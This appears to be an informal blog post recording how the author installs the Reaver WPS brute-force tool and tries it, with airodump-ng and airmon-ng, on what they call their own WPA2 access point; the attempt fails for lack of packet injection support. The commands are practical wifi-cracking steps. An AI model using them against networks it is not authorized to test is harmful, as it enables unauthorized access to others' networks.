I've been hearing all about this tool "Reaver":
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf
1) Download (I downloaded the latest tar.gz, 1.2)
2) Ungzip, untar: `tar xvfz reaver-1.2.tar.gz`
3) Install dependencies: `sudo apt-get install libpcap-dev`
*NOTE* -- It seems like it may also depend on SQLite ... or something; this is from the comments:
3a.) `sudo apt-get install libsqlite3-dev`
4) config, make install:
`sudo make install`
5) Now type `reaver` at the command line to see usage :)
You'll also probably want the aircrack-ng suite if you haven't done any wifi cracking/recon/diddling before...
I'm going to just type out what I'm doing as I go along to actually use reaver.
1) `sudo airodump-ng eth1`, checking the BSSIDs and looking for my WPA2 AP.
2) `sudo airmon-ng start eth1`
3) Exit, then run reaver: `sudo reaver -i eth1 -b 00:11:22:33:44:55 -c 11 -vv`
Now... I'm not sure if it's doing its magic. I'll check wireshark soon, and maybe read the paper about the vulnerability, but I'm in script kiddie mode at the moment.
It wasn't doing its magic. My card doesn't support packet INJECTION. Oh well, maybe someday I'll get a real man's wifi interface.
Also here's someone actually running the attack: